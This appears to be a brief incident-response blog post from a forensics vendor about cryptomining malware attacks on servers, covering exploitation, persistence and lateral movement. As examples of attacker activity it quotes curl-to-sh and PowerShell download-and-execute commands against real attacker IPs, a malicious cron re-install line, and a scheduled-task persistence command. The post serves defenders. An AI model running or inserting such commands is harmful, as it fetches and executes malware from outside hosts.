Open in app

Sign in

Write

Sign in

Responding to Mining Malware Attacks against Servers

Forensic Labs
Cloud Forensics
Published in
2 min readJun 13, 2018

A large number of server-side exploits have been used over the last year to install crypto-currency mining malware. Below we’ve outlined the typical stages of a mining malware attack against a server, and the steps you may want to take during forensics and incident response.

We’ve built a platform to automate incident response and forensics in AWS/Azure/GCP— you can grab a free trial here.. You can also download a free playbook we’ve written on how to respond to security incidents in AWS.

Exploitation

You may see records of the original exploit within web-server or application logs.

Download

Following exploitation, typically an installation script is executed such as:

curl -s http://149.255.35[.]91/larva.sh |sh

Or on Windows:

powershell IEX (New-Object Net.WebClient).DownloadString(‘http://158.69.133.17:8220/1.ps1')

If you’re lucky enough to have them, you can also check Powershell and SysMon logs for this activity.

Installation & Persistence — Windows

Scheduled tasks are commonly used. For example the Retadup mining worm creates a scheduled task like:

schtasks /create /sc minute /mo 1 /tn bqspogcjposfemiigrgmk /tr
“C:\bqspogcjposfemiigrgmk\bqspogcjposfemiigrgmk.exe

Scheduled tasks are stored at:

C:\Windows\Tasks
C:\Windows\System32\Tasks
C:\Windows\SysWow64\Tasks

And are parsed by tools such as Log2Timeline, as well as being recorded by Event Logs.

Installation & Persistence — Linux

Mining malware is typically installed via a Bash script post-exploitation. They will also install permanently through Cronjobs, with a command such as:

* * * * curl -s http://dangerousdesigns[.]org/logo.jpg | bash -s

This downloads a bash script to re-install the malware, and executes it via bash. You can check for Cronjobs under /etc/crontab/ and /var/spool/cron/

You can also check /var/log/syslog for executed cron files, for example:

**Dec 24 02:10:01 node23 CRON[5283]: (root) CMD ( /usr/sbin/monero)**

Mining

Review network traffic for connections to Mining pool domains.

Most mining malware, and the actual mining software, is detected well by anti-virus.

There are also Yara rules available that can be used to find mining software.

Lateral Movement

Some mining malware acts as a worm. Typically they spread within networks NotPetya style using EternalBlue and Mimikatz.

We’ve created a new tool to automate investigating and responding to security incidents in AWS and Azure — you can get a free trial here.

Dfir
Forensics
Cybersecurity
Malware
Security

--

--

Forensic Labs
Cloud Forensics

Written by Forensic Labs

405 Followers
Editor for

https://www.cadosecurity.com/

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams